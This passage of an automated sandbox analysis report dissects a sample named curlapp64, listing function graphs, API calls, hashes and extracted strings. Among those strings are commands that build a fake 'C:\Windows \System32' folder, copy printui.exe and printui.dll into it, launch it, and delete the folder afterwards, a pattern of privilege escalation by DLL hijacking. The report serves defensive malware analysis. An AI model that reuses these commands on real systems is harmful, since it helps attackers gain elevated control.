                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: curl_easy_init$curl_easy_cleanup
                                                                                                                                • String ID: CURL could not be initialized download_file$CURL could not be re-initialized download_file$CURL could not be re-initialized_2 download_file
                                                                                                                                • API String ID: 2458899574-242915743
                                                                                                                                • Opcode ID: 0548e829b7510095a7342c261aabaeb2c1a9aed6e4fc6070465a34d6ff3d73d0
                                                                                                                                • Instruction ID: c5d194006951d78399af4e0f5cc5d4c516438281b7fb0f3c95e56d2f15c71d4c
                                                                                                                                • Opcode Fuzzy Hash: 0548e829b7510095a7342c261aabaeb2c1a9aed6e4fc6070465a34d6ff3d73d0
                                                                                                                                • Instruction Fuzzy Hash: C122A072A1878185EB108F64F4A03BD6761FB867A5F505375EAED86BD9EF78E080C340
                                                                                                                                Function 00007FF8A93249E0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 342COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1600 7ff8a93249e0-7ff8a9324a2c 1601 7ff8a9324a30-7ff8a9324a37 1600->1601 1601->1601 1602 7ff8a9324a39-7ff8a9324a45 1601->1602 1603 7ff8a9324a87-7ff8a9324aa3 1602->1603 1604 7ff8a9324a47-7ff8a9324a5d call 7ff8a934e230 1602->1604 1605 7ff8a9324ab5-7ff8a9324aca call 7ff8a93250c0 1603->1605 1606 7ff8a9324aa5-7ff8a9324ab0 call 7ff8a9347730 1603->1606 1612 7ff8a9324a5f-7ff8a9324a71 call 7ff8a934e230 1604->1612 1613 7ff8a9324a73-7ff8a9324a82 call 7ff8a9314a70 1604->1613 1614 7ff8a9324ae9-7ff8a9324af0 1605->1614 1615 7ff8a9324acc-7ff8a9324ae5 call 7ff8a9314b60 1605->1615 1606->1605 1612->1603 1612->1613 1623 7ff8a9324f0c 1613->1623 1619 7ff8a9324aff-7ff8a9324b03 1614->1619 1620 7ff8a9324af2-7ff8a9324afa call 7ff8a9347770 1614->1620 1615->1614 1626 7ff8a9324b09-7ff8a9324b13 1619->1626 1627 7ff8a9324f01-7ff8a9324f09 1619->1627 1620->1619 1628 7ff8a9324f0f-7ff8a9324f35 call 7ff8a9369e10 1623->1628 1629 7ff8a9324b49-7ff8a9324b5f inet_pton 1626->1629 1630 7ff8a9324b15-7ff8a9324b43 call 7ff8a9338350 * 2 1626->1630 1627->1623 1632 7ff8a9324b61-7ff8a9324b65 1629->1632 1633 7ff8a9324b67-7ff8a9324b7d inet_pton 1629->1633 1630->1629 1650 7ff8a9324ede-7ff8a9324ee3 1630->1650 1637 7ff8a9324b87-7ff8a9324b9a call 7ff8a93118a0 1632->1637 1638 7ff8a9324c0d-7ff8a9324c15 1633->1638 1639 7ff8a9324b83 1633->1639 1637->1650 1651 7ff8a9324ba0-7ff8a9324ba8 1637->1651 1641 7ff8a9324c17-7ff8a9324c25 1638->1641 1642 7ff8a9324c56-7ff8a9324c67 call 7ff8a934e230 1638->1642 1639->1637 1646 7ff8a9324c42-7ff8a9324c50 1641->1646 1647 7ff8a9324c27-7ff8a9324c3c call 7ff8a93243b0 1641->1647 1653 7ff8a9324cfb 1642->1653 1654 7ff8a9324c6d 1642->1654 1646->1642 1646->1650 1647->1646 1650->1628 1656 7ff8a9324baa-7ff8a9324bb8 call 7ff8a9347730 1651->1656 1657 7ff8a9324bbd-7ff8a9324be4 call 7ff8a9323e50 1651->1657 1661 7ff8a9324d02-7ff8a9324d0b 1653->1661 1660 7ff8a9324c74-7ff8a9324c7b 1654->1660 1656->1657 1666 7ff8a9324bf7-7ff8a9324bfa 1657->1666 1667 7ff8a9324be6-7ff8a9324bf3 call 7ff8a9347770 1657->1667 1660->1660 1664 7ff8a9324c7d-7ff8a9324c81 1660->1664 1661->1661 1665 7ff8a9324d0d-7ff8a9324d44 htons inet_pton 1661->1665 1668 7ff8a9324ca0-7ff8a9324ca3 1664->1668 1669 7ff8a9324c83-7ff8a9324c9e call 7ff8a934e2a0 1664->1669 1670 7ff8a9324d4e-7ff8a9324d69 calloc 1665->1670 1671 7ff8a9324d46-7ff8a9324d49 1665->1671 1673 7ff8a9324c00-7ff8a9324c08 call 7ff8a93116c0 1666->1673 1674 7ff8a9324ef3-7ff8a9324efc call 7ff8a93252d0 1666->1674 1667->1666 1679 7ff8a9324ccb-7ff8a9324cd8 call 7ff8a9325510 1668->1679 1680 7ff8a9324ca5-7ff8a9324cac 1668->1680 1669->1653 1669->1668 1677 7ff8a9324d6b-7ff8a9324d6e 1670->1677 1678 7ff8a9324d73-7ff8a9324dac 1670->1678 1676 7ff8a9324e9a-7ff8a9324e9d 1671->1676 1673->1627 1674->1627 1676->1651 1682 7ff8a9324ea3-7ff8a9324ea6 1676->1682 1677->1676 1686 7ff8a9324db0-7ff8a9324dbf 1678->1686 1679->1650 1694 7ff8a9324cde-7ff8a9324ceb call 7ff8a9323e40 1679->1694 1680->1679 1687 7ff8a9324cae-7ff8a9324cc6 call 7ff8a93163d0 1680->1687 1682->1627 1689 7ff8a9324ea8-7ff8a9324eb9 1682->1689 1686->1686 1691 7ff8a9324dc1-7ff8a9324dc8 1686->1691 1687->1676 1695 7ff8a9324ebb-7ff8a9324ec0 call 7ff8a93166b0 1689->1695 1696 7ff8a9324ec2 call 7ff8a93025a0 1689->1696 1697 7ff8a9324dd0-7ff8a9324dd7 1691->1697 1703 7ff8a9324cf0-7ff8a9324cf6 1694->1703 1705 7ff8a9324ec7-7ff8a9324ed0 1695->1705 1696->1705 1697->1697 1702 7ff8a9324dd9-7ff8a9324dee calloc 1697->1702 1706 7ff8a9324df4-7ff8a9324e77 htons inet_pton 1702->1706 1707 7ff8a9324e97 1702->1707 1703->1676 1708 7ff8a9324eda-7ff8a9324edc 1705->1708 1709 7ff8a9324ed2-7ff8a9324ed5 call 7ff8a93252d0 1705->1709 1710 7ff8a9324e80-7ff8a9324e8f 1706->1710 1707->1676 1708->1650 1713 7ff8a9324ee5-7ff8a9324ef1 1708->1713 1709->1708 1710->1710 1711 7ff8a9324e91-7ff8a9324e95 1710->1711 1711->1676 1713->1627
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: inet_pton$SimpleString::operator=inet_ntop
                                                                                                                                • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                                                                                                                                • API String ID: 1960554822-2421204314
                                                                                                                                • Opcode ID: a7579fbb8c7303b0e99bbfd45d6107bad90a3fdeae64caa5b37a03e7b5644057
                                                                                                                                • Instruction ID: 2a2d044d4f0c2c52169b4cba5adb4d4cc12df3304e3bcb14340e326e5e1304ba
                                                                                                                                • Opcode Fuzzy Hash: a7579fbb8c7303b0e99bbfd45d6107bad90a3fdeae64caa5b37a03e7b5644057
                                                                                                                                • Instruction Fuzzy Hash: EEE19962B0EEC2A6FB148F6995443B927B1EB54BD8F44A235CE1D8B795EF3CE0558300
                                                                                                                                Function 00007FF8A934B3F0 Relevance: 24.2, APIs: 16, Instructions: 185networkCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1809 7ff8a934b3f0-7ff8a934b438 socket 1810 7ff8a934b43f-7ff8a934b4be htonl setsockopt 1809->1810 1811 7ff8a934b43a 1809->1811 1813 7ff8a934b4c4-7ff8a934b4da bind 1810->1813 1814 7ff8a934b661-7ff8a934b67d closesocket * 3 1810->1814 1812 7ff8a934b6aa-7ff8a934b6c1 call 7ff8a9369e10 1811->1812 1813->1814 1815 7ff8a934b4e0-7ff8a934b4f4 getsockname 1813->1815 1816 7ff8a934b682-7ff8a934b6a2 1814->1816 1815->1814 1819 7ff8a934b4fa-7ff8a934b4fe 1815->1819 1816->1812 1819->1814 1820 7ff8a934b504-7ff8a934b515 listen 1819->1820 1820->1814 1821 7ff8a934b51b-7ff8a934b532 socket 1820->1821 1821->1814 1822 7ff8a934b538-7ff8a934b54e connect 1821->1822 1822->1814 1823 7ff8a934b554-7ff8a934b563 call 7ff8a933c2d0 1822->1823 1823->1814 1826 7ff8a934b569-7ff8a934b59e call 7ff8a9342110 accept 1823->1826 1826->1814 1829 7ff8a934b5a4-7ff8a934b5c9 call 7ff8a9353b60 call 7ff8a933fe30 1826->1829 1829->1814 1834 7ff8a934b5cf-7ff8a934b5dc send 1829->1834 1835 7ff8a934b5e2-7ff8a934b61f call 7ff8a9342110 recv 1834->1835 1838 7ff8a934b625-7ff8a934b656 WSAGetLastError call 7ff8a9353b60 call 7ff8a9353bf0 1835->1838 1839 7ff8a934b6c2-7ff8a934b6c5 1835->1839 1838->1814 1851 7ff8a934b658-7ff8a934b65f 1838->1851 1840 7ff8a934b6cf-7ff8a934b6d7 1839->1840 1841 7ff8a934b6c7-7ff8a934b6ca 1839->1841 1840->1814 1843 7ff8a934b6d9-7ff8a934b6e0 1840->1843 1841->1835 1843->1814 1845 7ff8a934b6e6-7ff8a934b6ea 1843->1845 1847 7ff8a934b6ec-7ff8a934b6fb call 7ff8a933c2d0 1845->1847 1848 7ff8a934b717-7ff8a934b722 closesocket 1845->1848 1847->1814 1853 7ff8a934b701-7ff8a934b711 call 7ff8a933c2d0 1847->1853 1848->1816 1851->1814 1851->1835 1853->1814 1853->1848
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3053784475-0
                                                                                                                                • Opcode ID: 30fed3b6c4e5f19c3eb878747b654b4228dd43215c1525b57537cba8c6bc3322
                                                                                                                                • Instruction ID: cae04f7ce9b11a56518409939267237ed05c6b60d12adeb597f372cba6c6d930
                                                                                                                                • Opcode Fuzzy Hash: 30fed3b6c4e5f19c3eb878747b654b4228dd43215c1525b57537cba8c6bc3322
                                                                                                                                • Instruction Fuzzy Hash: 7A819E21B0DE81A5F7209F74D8143AD2370EB84BA8F506335DE6D8AAE8DF3CD55A8700
                                                                                                                                Function 00007FF6CABD9220 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 169processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID: C:\Windows \System32$\printui.dll$\printui.exe$cmd.exe /c {}$mkdir "\\?\C:\Windows \System32"
                                                                                                                                • API String ID: 963392458-2489276278
                                                                                                                                • Opcode ID: 9421768b770d567a60899f065d7511b2343ece66166a74277076647c42df128c
                                                                                                                                • Instruction ID: 138845c4ada4ddf53186ee30e8781ea4fe6ca64e116a1a96c281af6b10ac34fb
                                                                                                                                • Opcode Fuzzy Hash: 9421768b770d567a60899f065d7511b2343ece66166a74277076647c42df128c
                                                                                                                                • Instruction Fuzzy Hash: E5718D32E18B858AE700CFA5E8503ED73B1FB99798F505226EACC92A59DF78D185C740
                                                                                                                                Function 00007FF8A933B4E0 Relevance: 15.4, APIs: 10, Instructions: 364COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8998d647a655d3b98da3305d60d5bdf6c58db7bd62dc7a0ea4464522289d7340
                                                                                                                                • Instruction ID: 293da621eab9ff0894772db08a180cf3e46e73993170244e52c8b76c0e657477
                                                                                                                                • Opcode Fuzzy Hash: 8998d647a655d3b98da3305d60d5bdf6c58db7bd62dc7a0ea4464522289d7340
                                                                                                                                • Instruction Fuzzy Hash: 67E16E22B5EAD292EB548F26E4507BB67B5FB847C4F546039EE8E87A54DF3CD4408B00
                                                                                                                                Function 00007FF6CAC0393C Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                • Opcode ID: c36d5e2f6024639414df951a4179946f9be0986b4d04d1258ac58a2aca572ab2
                                                                                                                                • Instruction ID: ed5199d9352910ea399ee4bd1cb12c1474d604ff19101dd33f586ca818c993b7
                                                                                                                                • Opcode Fuzzy Hash: c36d5e2f6024639414df951a4179946f9be0986b4d04d1258ac58a2aca572ab2
                                                                                                                                • Instruction Fuzzy Hash: B6C1E177B28A8186EB10CFA9E4A02AC3771FB49B99F005265DFAE97794CF38D451C740
                                                                                                                                Function 00007FF6CABD89B0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 246COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2494880260.00007FF6CABB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CABB0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2494852809.00007FF6CABB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494921212.00007FF6CAC09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494965412.00007FF6CAC41000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2494987758.00007FF6CAC45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff6cabb0000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: C:\Windows\System32\printui.exe$mkdir "\\?\C:\Windows \System32"$printui.dll copy error: {}$printui.exe copy error: {}$rmdir /s /q "C:\Windows \"$start "" "{}"
                                                                                                                                • API String ID: 3668304517-2480677128
                                                                                                                                • Opcode ID: 9115715e9d1820e5a2387ad5d1faf78ddb0d0e9a12366fef12d03b2854ec9e88
                                                                                                                                • Instruction ID: 360d7c6f9edfe69d5abef65e8843731ce8914110e1043420c407d3793ee8c285
                                                                                                                                • Opcode Fuzzy Hash: 9115715e9d1820e5a2387ad5d1faf78ddb0d0e9a12366fef12d03b2854ec9e88
                                                                                                                                • Instruction Fuzzy Hash: D1B14813E082D149E7018FB590541FD7FB0EB0A75AF5981B6DBE89BA8BDA28D285C310
                                                                                                                                Function 00007FF8A933AA52 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 339COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$CounterPerformanceQuery
                                                                                                                                • String ID: Resolving timed out after %lld milliseconds
                                                                                                                                • API String ID: 3490100708-1439975193
                                                                                                                                • Opcode ID: dae43c0efefee89e3c2c18a8cf490f57449ca173e131bb0e246affb4e317de22
                                                                                                                                • Instruction ID: 1f511ad479227d450863d305733a0a7a441856949b98bc433cda96a7fa074c79
                                                                                                                                • Opcode Fuzzy Hash: dae43c0efefee89e3c2c18a8cf490f57449ca173e131bb0e246affb4e317de22
                                                                                                                                • Instruction Fuzzy Hash: 0DE18D61A4EEC2A1EB549F2994002BA73B0EF45BC8F446139DE4EC7696DF3DE885C300
                                                                                                                                Function 00007FF8A933A4A4 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 318COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free
                                                                                                                                • String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
                                                                                                                                • API String ID: 1294909896-247252918
                                                                                                                                • Opcode ID: 1e600b1a8b8236b90229c6a326d8c74d4e308254380ca5230925715009d256f0
                                                                                                                                • Instruction ID: 2038d5dd16d96661e00b331f5a2a8196a97eae0ff3ed0b6206fd15a95ce7233e
                                                                                                                                • Opcode Fuzzy Hash: 1e600b1a8b8236b90229c6a326d8c74d4e308254380ca5230925715009d256f0
                                                                                                                                • Instruction Fuzzy Hash: 2FD18D62A4EEC2A1EB249E2594542BA37B1EF41BC8F04A139DE4EC76D5DF3CE844C340
                                                                                                                                Function 00007FF8A9305CE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ioctlsocketrecv
                                                                                                                                • String ID: cf_socket_shutdown(%qd)
                                                                                                                                • API String ID: 2464938158-3341341643
                                                                                                                                • Opcode ID: 17d38f6d1d561d5458d91d58f5712dc195690641309d8514a42563887b4fcec5
                                                                                                                                • Instruction ID: 09407467e38631efbb078ba96b646e57e14b748a533acd10296b724eeb5108f1
                                                                                                                                • Opcode Fuzzy Hash: 17d38f6d1d561d5458d91d58f5712dc195690641309d8514a42563887b4fcec5
                                                                                                                                • Instruction Fuzzy Hash: AC118E6160EAC251EB609F62E8143A663B0EB48BDCF545232CB6D8779ADE2CE046C704
                                                                                                                                Function 00007FF8A93263C0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 624COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.2495037930.00007FF8A9301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8A9300000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.2495011901.00007FF8A9300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495090755.00007FF8A936B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495121747.00007FF8A9387000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495143588.00007FF8A9388000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495161592.00007FF8A9389000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.2495177927.00007FF8A938B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_7ff8a9300000_curlapp64.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free
                                                                                                                                • String ID: HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s $%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$1.0$1.1$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Alt-Used$Alt-Used: %s:%d$Connection$Connection: %s%sTETE: gzip$Content-Range$Content-Range: bytes %s%lld/%lld$Content-Range: bytes %s/%lld$Content-Range: bytes 0-%lld/%lld$GET$HEAD$HTTP request too large$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$User-Agent
                                                                                                                                • API String ID: 1294909896-1770648156
                                                                                                                                • Opcode ID: d01dbf821eb6e50b7745be4e05e57908a55b81103d6f5f03b7adfae2cab5ceb3
                                                                                                                                • Instruction ID: 9cbbc9b41a8eb694f61e27bbe1799d009636a92a2f6f2baa4db69100a089d8c6
                                                                                                                                • Opcode Fuzzy Hash: d01dbf821eb6e50b7745be4e05e57908a55b81103d6f5f03b7adfae2cab5ceb3
                                                                                                                                • Instruction Fuzzy Hash: FF526B62A0EFC2A5EF559F26A4403B927B0EF65BC8F586036CE4E86695DF3CE544C340
                                                                                                                                Function 00007FF8A93079F0 Relevance: 47.6, APIs: 17, Strings: 10, Instructions: 303networkCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
